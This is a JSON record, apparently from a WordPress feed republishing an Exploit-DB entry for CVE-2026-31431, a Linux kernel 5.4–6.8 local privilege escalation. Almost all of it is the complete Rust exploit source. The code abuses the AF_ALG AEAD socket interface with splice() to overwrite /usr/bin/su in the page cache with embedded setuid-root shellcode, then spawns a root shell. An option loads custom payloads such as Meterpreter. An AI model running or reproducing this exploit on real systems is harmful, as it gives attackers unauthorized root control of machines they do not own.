{“lastseen”:”2026-05-26T15:27:57″,”description”:”Exploit Title: Linux Kernel 5.4 – 6.8 – Local Privilege Escalation Google Dork: N\/A Date: 2026-04-30 Exploit Author: Long Fong Chan https:\/\/github.com\/iss4cf0ng Vendor Homepage: https:\/\/www.kernel.org\/ Software Link: https:\/\/git.kernel.org\/ Version:…”,”published”:”2026-05-26T00:00:00″,”modified”:”2026-05-26T00:00:00″,”type”:”exploitdb”,”title”:”Linux Kernel 6.8 – Local Privilege Escalation”,”source”:””,”references”:””,”id”:”EDB-ID:52573″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-31431″],”sourceData”:” * Exploit Title: Linux Kernel 5.4 – 6.8 – Local Privilege Escalation\\r\\n * Google Dork: N\/A\\r\\n * Date: 2026-04-30\\r\\n * Exploit Author: Long Fong Chan (https:\/\/github.com\/iss4cf0ng)\\r\\n * Vendor Homepage: https:\/\/www.kernel.org\/\\r\\n * Software Link: https:\/\/git.kernel.org\/\\r\\n * Version: Linux Kernel 5.4 – 6.8 (unpatched)\\r\\n * Tested on: Ubuntu 22.04, Debian 12\\r\\n * \\r\\n * Description:\\r\\n * Linux kernel AF_ALG (algif_aead) vulnerability allows local users\\r\\n * to perform arbitrary file overwrite in page cache via splice()\\r\\n * and AEAD crypto interface, leading to privilege escalation.\\r\\n *\\r\\n * This exploit overwrites \/usr\/bin\/su in memory and spawns a root shell.\\r\\n * \\r\\n * Requirements:\\r\\n * – Unprivileged local user\\r\\n * – algif_aead module loaded\\r\\n *\\r\\n * Usage:\\r\\n * –test Check vulnerability\\r\\n * –exploit Spawn root shell\\r\\n * –bin \\u003cfile\\u003e Use custom payload\\r\\n *\/\\r\\n\\r\\nuse std::{env, fs, io};\\r\\nuse std::ffi::CString;\\r\\nuse std::fs::File;\\r\\nuse std::io::{Read, Write};\\r\\nuse std::os::unix::io::AsRawFd;\\r\\n\\r\\nconst TARGET_BINARY: \\u0026str = \\”\/usr\/bin\/su\\”;\\r\\nconst TEST_FILE: \\u0026str = \\”\/tmp\/.cve_test\\”;\\r\\n\\r\\n\/\/ Shellcode (\/bin\/bash)\\r\\n\/*\\r\\n; https:\/\/filippo.io\/linux-syscall-table\/\\r\\ndb 0x7f, ‘ELF’, 2, 1, 1, 0 ; e_ident\\r\\ndq 0 ; padding\\r\\ndw 2 ; e_type (ET_EXEC)\\r\\ndw 62 ; e_machine (EM_X86_64)\\r\\ndd 1 ; e_version\\r\\ndq 0x400078 ; e_entry (Entry point)\\r\\ndq 0x40 ; e_phoff (Program Header Offset)\\r\\ndq 0 ; e_shoff\\r\\ndd 0 ; e_flags\\r\\ndw 64 ; e_ehsize\\r\\ndw 56 ; e_phentsize\\r\\ndw 1 ; e_phnum\\r\\ndw 0, 0, 0 ; s_header info\\r\\n\\r\\n; Program Header\\r\\ndd 1 ; p_type (PT_LOAD)\\r\\ndd 5 ; p_flags (PF_R | PF_X)\\r\\ndq 0 ; p_offset\\r\\ndq 0x400000 ; p_vaddr\\r\\ndq 0x400000 ; p_paddr\\r\\ndq 0x9e ; p_filesz\\r\\ndq 0x9e ; p_memsz\\r\\ndq 0x1000 ; p_align\\r\\n\\r\\n; Program\\r\\n_start:\\r\\n ; setuid(0)\\r\\n xor eax, eax ; clear eax\\r\\n xor edi, edi ; edi = 0 (UID 0)\\r\\n mov al, 105 ; syscall 105 (setuid)\\r\\n syscall\\r\\n\\r\\n ; execve(\\”\/bin\/bash\\”, NULL, NULL)\\r\\n lea rdi, [rel path] ; Load effective address of the string\\r\\n xor esi, esi ; argv = NULL\\r\\n cdq ; edx = 0 (envp = NULL)\\r\\n mov al, 59 ; syscall 59 (execve)\\r\\n syscall\\r\\n\\r\\n ; exit(0)\\r\\n xor edi, edi\\r\\n push 60\\r\\n pop rax ; syscall 60 (exit)\\r\\n syscall\\r\\n\\r\\npath: db \\”\/bin\/bash\\”, 0\\r\\n*\/\\r\\nconst BASH_SHELLCODE: \\u0026[u8] = \\u0026[\\r\\n 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\\r\\n 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\\r\\n 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\\r\\n 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\\r\\n 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\\r\\n 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\\r\\n 0x9e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\\r\\n 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xc0, 0x31, 0xff, 0xb0, 0x69, 0x0f, 0x05,\\r\\n 0x48, 0x8d, 0x3d, 0x0f, 0x00, 0x00, 0x00, 0x31, 0xf6, 0x6a, 0x3b, 0x58, 0x99, 0x0f, 0x05, 0x31,\\r\\n 0xff, 0x6a, 0x3c, 0x58, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00\\r\\n];\\r\\n\\r\\nunsafe fn inject_payload(fd: i32, payload: \\u0026[u8]) {\\r\\n for i in (0..payload.len()).step_by(4) {\\r\\n let mut chunk = [0u8; 4];\\r\\n let end = std::cmp::min(i + 4, payload.len());\\r\\n chunk[..end – i].copy_from_slice(\\u0026payload[i..end]);\\r\\n \\r\\n do_kernel_injection(fd, i, \\u0026chunk);\\r\\n \\r\\n if i % 40 == 0 {\\r\\n io::stdout().flush().ok(); \\r\\n }\\r\\n }\\r\\n}\\r\\n\\r\\n\/\/ Linux kernel injection\\r\\nunsafe fn do_kernel_injection(target_fd: i32, t_idx: usize, chunk: \\u0026[u8]) {\\r\\n let master_fd = libc::socket(38, libc::SOCK_SEQPACKET, 0);\\r\\n let mut addr: [u8; 88] = [0; 88]; \\r\\n addr[0..2].copy_from_slice(\\u002638u16.to_ne_bytes());\\r\\n std::ptr::copy_nonoverlapping(\\”aead\\”.as_ptr(), addr.as_mut_ptr().add(2), 4);\\r\\n let name = \\”authencesn(hmac(sha256),cbc(aes))\\”;\\r\\n std::ptr::copy_nonoverlapping(name.as_ptr(), addr.as_mut_ptr().add(24), name.len());\\r\\n libc::bind(master_fd, addr.as_ptr() as _, 88);\\r\\n\\r\\n let mut key = [0u8; 40];\\r\\n key[0..8].copy_from_slice(\\u0026[0x08, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x10]);\\r\\n libc::setsockopt(master_fd, 279, 1, key.as_ptr() as _, 40);\\r\\n libc::setsockopt(master_fd, 279, 5, \\u00264u32 as *const _ as _, 4);\\r\\n\\r\\n let op_fd = libc::accept(master_fd, std::ptr::null_mut(), std::ptr::null_mut());\\r\\n let mut cmsg_buf = [0u8; 128];\\r\\n let mut data = [0u8; 8];\\r\\n data[0..4].copy_from_slice(b\\”AAAA\\”);\\r\\n data[4..8].copy_from_slice(chunk);\\r\\n \\r\\n let mut iov = libc::iovec { iov_base: data.as_mut_ptr() as _, iov_len: 8 };\\r\\n let mut msg: libc::msghdr = std::mem::zeroed();\\r\\n msg.msg_iov = \\u0026mut iov;\\r\\n msg.msg_iovlen = 1;\\r\\n msg.msg_control = cmsg_buf.as_mut_ptr() as _;\\r\\n \\r\\n let mut p = cmsg_buf.as_mut_ptr();\\r\\n\\r\\n let mut h1: libc::cmsghdr = std::mem::zeroed();\\r\\n h1.cmsg_len = libc::CMSG_LEN(4) as _;\\r\\n h1.cmsg_level = 279;\\r\\n h1.cmsg_type = 3;\\r\\n *(p as *mut libc::cmsghdr) = h1;\\r\\n p = p.add(libc::CMSG_SPACE(4) as usize);\\r\\n\\r\\n let mut h2: libc::cmsghdr = std::mem::zeroed();\\r\\n h2.cmsg_len = libc::CMSG_LEN(20) as _;\\r\\n h2.cmsg_level = 279;\\r\\n h2.cmsg_type = 2;\\r\\n *(p as *mut libc::cmsghdr) = h2;\\r\\n *(libc::CMSG_DATA(p as _) as *mut u32) = 16;\\r\\n p = p.add(libc::CMSG_SPACE(20) as usize);\\r\\n\\r\\n let mut h3: libc::cmsghdr = std::mem::zeroed();\\r\\n h3.cmsg_len = libc::CMSG_LEN(4) as _;\\r\\n h3.cmsg_level = 279;\\r\\n h3.cmsg_type = 4;\\r\\n *(p as *mut libc::cmsghdr) = h3;\\r\\n *(libc::CMSG_DATA(p as _) as *mut u32) = 8;\\r\\n \\r\\n msg.msg_controllen = 32 + 16 + 16; \\r\\n\\r\\n libc::sendmsg(op_fd, \\u0026msg, 0x8000);\\r\\n \\r\\n let mut pipes = [0i32; 2];\\r\\n libc::pipe(pipes.as_mut_ptr());\\r\\n let mut off: i64 = 0;\\r\\n \\r\\n libc::splice(target_fd, \\u0026mut off, pipes[1], std::ptr::null_mut(), t_idx + 4, 0);\\r\\n libc::splice(pipes[0], std::ptr::null_mut(), op_fd, std::ptr::null_mut(), t_idx + 4, 0);\\r\\n \\r\\n let mut drain = [0u8; 1024];\\r\\n libc::recv(op_fd, drain.as_mut_ptr() as _, 1024, 0x40);\\r\\n\\r\\n libc::close(op_fd); libc::close(master_fd);\\r\\n libc::close(pipes[0]); libc::close(pipes[1]);\\r\\n}\\r\\n\\r\\nfn main() -\\u003e io::Result\\u003c()\\u003e {\\r\\n let args: Vec\\u003cString\\u003e = env::args().collect();\\r\\n println!(\\”————————————————–\\”);\\r\\n println!(\\” CVE-2026-31431 Linux Copy-Fail Exploit (Rust) \\”);\\r\\n println!(\\”————————————————–\\”);\\r\\n\\r\\n if args.len() \\u003c 2 {\\r\\n println!(\\”Usage: {} [–test | –exploit | –bin \\u003cfile\\u003e]\\”, args[0]);\\r\\n return Ok(());\\r\\n }\\r\\n\\r\\n match args[1].as_str() {\\r\\n\\r\\n \\”–test\\” =\\u003e {\\r\\n \/\/ Test vulnerability\\r\\n\\r\\n println!(\\”[*] Mode: Vulnerability Testing\\”);\\r\\n \\r\\n let mut f = File::create(TEST_FILE)?;\\r\\n f.write_all(\\u0026vec![b’A’; 64])?;\\r\\n let target = File::open(TEST_FILE)?;\\r\\n \\r\\n unsafe {\\r\\n inject_payload(target.as_raw_fd(), b\\”HACK\\”)\\r\\n };\\r\\n \\r\\n let mut res = vec![0u8; 4];\\r\\n File::open(TEST_FILE)?.read_exact(\\u0026mut res)?;\\r\\n \\r\\n if \\u0026res == b\\”HACK\\” {\\r\\n println!(\\”\\\\x1b[31;1m[!] VULNERABLE!\\\\x1b[0m\\”);\\r\\n }\\r\\n else {\\r\\n println!(\\”[+] SAFE\\”);\\r\\n }\\r\\n \\r\\n fs::remove_file(TEST_FILE).ok();\\r\\n }\\r\\n\\r\\n \\”–exploit\\” =\\u003e {\\r\\n \/\/ Vulnerability exploitation, provide interactive shell\\r\\n \\r\\n println!(\\”[*] Mode: Privilege Escalation (Default: \/bin\/bash)\\”);\\r\\n \\r\\n let target = File::open(TARGET_BINARY)?;\\r\\n unsafe {\\r\\n inject_payload(target.as_raw_fd(), BASH_SHELLCODE)\\r\\n };\\r\\n \\r\\n println!(\\”\\\\n[+] Spawning root shell…\\”);\\r\\n \\r\\n let cmd = CString::new(\\”su\\”).unwrap();\\r\\n unsafe {\\r\\n libc::execvp(cmd.as_ptr(), [cmd.as_ptr(), std::ptr::null()].as_ptr());\\r\\n }\\r\\n }\\r\\n\\r\\n \\”–bin\\” =\\u003e {\\r\\n \/\/ Load customized shellcode bin file, such as Meterpreter\\r\\n\\r\\n if args.len() \\u003c 3 {\\r\\n println!(\\”[!] Error: Please specify a bin file.\\”);\\r\\n return Ok(());\\r\\n }\\r\\n\\r\\n let bin_path = \\u0026args[2];\\r\\n\\r\\n println!(\\”[*] Mode: Custom Shellcode Injection\\”);\\r\\n println!(\\”[*] Loading: {}\\”, bin_path);\\r\\n\\r\\n let custom_payload = fs::read(bin_path)?;\\r\\n let target = File::open(TARGET_BINARY)?;\\r\\n \\r\\n unsafe {\\r\\n inject_payload(target.as_raw_fd(), \\u0026custom_payload) \\r\\n };\\r\\n\\r\\n println!(\\”\\\\n[+] Injection complete. Executing {}…\\”, TARGET_BINARY);\\r\\n \\r\\n let cmd = CString::new(\\”su\\”).unwrap();\\r\\n unsafe {\\r\\n libc::execvp(cmd.as_ptr(), [cmd.as_ptr(), std::ptr::null()].as_ptr());\\r\\n }\\r\\n }\\r\\n \\r\\n _ =\\u003e println!(\\”[!] Unknown option.\\”)\\r\\n }\\r\\n\\r\\n Ok(())\\r\\n}”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52573″,”cvss”:{“score”:7.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52573″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-26T15:27:57″,”description”:”Exploit Title: Linux Kernel 5.4 – 6.8 – Local Privilege Escalation Google Dork: N\/A Date: 2026-04-30 Exploit Author: Long Fong Chan https:\/\/github.com\/iss4cf0ng Vendor Homepage: https:\/\/www.kernel.org\/…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,40,15,13,7,11,5],"class_list":["post-56932","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n